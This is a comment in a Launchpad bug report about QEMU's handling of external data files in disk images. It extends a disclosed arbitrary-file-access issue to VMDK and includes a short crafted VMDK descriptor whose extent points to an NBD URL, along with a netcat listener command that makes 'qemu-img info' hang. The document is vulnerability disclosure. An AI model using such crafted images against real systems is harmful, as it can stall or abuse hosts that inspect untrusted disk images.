Ubuntu Cloud Archive

Overview
Code
Bugs
Blueprints
Translations
Answers

Bug #2059809
Comment #53

Comment 53 for bug 2059809

Revision history for this message

Martin Kaesberger (mkaesberger) wrote on 2024-04-09: Re: Arbitrary file access through QCOW2 external data file

#53

This (separate) issue affects VMDK as well, but is limited by the allowed length. The payload from my poc doesn't fit, but here is a valid VMDK file, that will make qemu-img info to not return, if you `nc -vlp 1234`

```
version=1
CID=ffffffff
parentCID=ffffffff
createType="monolithicFlat"

# Extent description
RW 524288 FLAT "nbd://localhost:1234/xyz" 0

```

And in the future it might affect VHD [1] and VHDX [2] as well, if qemu continues to implement features.

[1] https://gitlab.com/qemu-project/qemu/-/blob/master/block/vpc.c?ref_type=heads#L123
[2] https://gitlab.com/qemu-project/qemu/-/blob/master/block/vhdx.c?ref_type=heads#L775